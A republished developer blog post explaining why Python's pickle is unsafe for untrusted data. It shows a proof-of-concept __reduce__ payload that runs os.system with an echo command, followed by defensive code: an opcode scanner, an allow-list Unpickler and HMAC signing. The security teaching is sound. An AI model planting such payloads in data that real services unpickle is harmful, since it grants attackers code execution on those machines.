This content originally appeared on DEV Community and was authored by Talles L
Here's why pickle is unsafe if you don't know the origin of the pickled data. A pickle is not passive data: it is a small program for pickle's stack machine, and its REDUCE opcode calls whatever importable callable the pickle names, with whatever arguments the pickle supplies. The Python documentation says so plainly: pickle is not secure, and you should never unpickle data that could have come from an untrusted source. Any object can choose that callable through __reduce__:

import os
import pickle

# Create a malicious class. __reduce__ tells pickle how to rebuild the object:
# call the first element of the tuple with the second element as its arguments.
class Malicious:
    def __reduce__(self):
        # os.system will execute the command on whatever machine unpickles this
        return (os.system, ('echo "This is malicious code!"',))

# Serialize the malicious object (harmless by itself)
malicious_data = pickle.dumps(Malicious())

# Deserialize the malicious object (this will execute the command)
pickle.loads(malicious_data)

Note that the victim never needs the Malicious class: the pickled bytes reference os.system by module and name, so any process that calls pickle.loads on them runs the command, and an attacker can write the same opcode sequence by hand without defining a class at all.
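The following is an added example, not code from the original post. It rebuilds the same os.system payload, then shows three things a practitioner wants around it: inspecting a pickle for the globals it will import without executing it (via pickletools, which is in the standard library), an allow-listing Unpickler in the style of the "Restricting Globals" recipe from the pickle documentation that refuses the payload before REDUCE runs, and an HMAC wrapper for the case where the producer is trusted but the transport is not. The helper names (referenced_globals, restricted_loads, is_safe_to_load, sign, verify_and_load), the SAFE_BUILTINS set and the sample dict are assumptions made for this example.

```python
import builtins
import hashlib
import hmac
import io
import os
import pickle
import pickletools

# Constructed payload using the same __reduce__ trick as the post:
# dumps() is harmless, only loads() would run the command.
class Malicious:
    def __reduce__(self):
        return (os.system, ('echo "This is malicious code!"',))

MALICIOUS_PICKLE = pickle.dumps(Malicious())
BENIGN_OBJECT = {"user": "alice", "ids": [1, 2, 3]}   # constructed sample data
BENIGN_PICKLE = pickle.dumps(BENIGN_OBJECT)


def referenced_globals(data):
    """Statically list the (module, name) pairs a pickle will import, without running it.

    Walks the opcode stream with pickletools.genops. GLOBAL (protocol <= 3) carries
    "module name" inline; STACK_GLOBAL (protocol >= 4) consumes the two most recently
    pushed strings. This minimal walker assumes those strings are pushed directly
    rather than fetched from the memo, which holds for pickle.dumps() of simple objects.
    """
    found = []
    strings = []
    for opcode, arg, _pos in pickletools.genops(data):
        if opcode.name == "GLOBAL":
            module, name = arg.split(" ", 1)
            found.append((module, name))
        elif opcode.name == "STACK_GLOBAL":
            found.append((strings[-2], strings[-1]))
        elif opcode.name in ("SHORT_BINUNICODE", "BINUNICODE", "BINUNICODE8", "UNICODE"):
            strings.append(arg)
    return found


# Allow-list unpickler: find_class() is consulted for every GLOBAL/STACK_GLOBAL,
# so refusing there stops the REDUCE before any callable is resolved.
SAFE_BUILTINS = {"range", "set", "frozenset", "slice"}   # assumed allow-list

class RestrictedUnpickler(pickle.Unpickler):
    def find_class(self, module, name):
        if module == "builtins" and name in SAFE_BUILTINS:
            return getattr(builtins, name)
        raise pickle.UnpicklingError(f"global '{module}.{name}' is forbidden")


def restricted_loads(data):
    return RestrictedUnpickler(io.BytesIO(data)).load()


def is_safe_to_load(data):
    """True if the allow-listed unpickler accepts the data, False if it refuses."""
    try:
        restricted_loads(data)
        return True
    except pickle.UnpicklingError:
        return False


# When the producer is trusted but the transport is not (cache, queue, cookie),
# authenticate the bytes with an HMAC and refuse to unpickle anything unsigned.
def sign(data, key):
    return hmac.new(key, data, hashlib.sha256).digest() + data


def verify_and_load(blob, key):
    tag, data = blob[:32], blob[32:]
    expected = hmac.new(key, data, hashlib.sha256).digest()
    if not hmac.compare_digest(tag, expected):
        raise ValueError("bad signature: refusing to unpickle")
    return pickle.loads(data)


if __name__ == "__main__":
    print("globals referenced by the payload:", referenced_globals(MALICIOUS_PICKLE))
    print("benign pickle accepted:", is_safe_to_load(BENIGN_PICKLE))
    print("malicious pickle accepted:", is_safe_to_load(MALICIOUS_PICKLE))
    key = os.urandom(32)
    print("signed round trip:", verify_and_load(sign(BENIGN_PICKLE, key), key))
```

Two caveats on the defences. The allow-list only helps if you keep it tiny and never admit a callable that can reach into other modules; the static scan is a triage aid for incident response, not a gate, because memo tricks and nested pickles can hide the names it reports. The HMAC wrapper does nothing against a producer who holds the key, so it is the right tool for integrity over an untrusted channel and the wrong tool for accepting input from users; for that, use a data-only format such as JSON.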
Talles L | Sciencx (2024-06-23T17:03:50+00:00) Arbitrary code execution with pickle. Retrieved from https://www.scien.cx/2024/06/23/arbitrary-code-execution-with-pickle/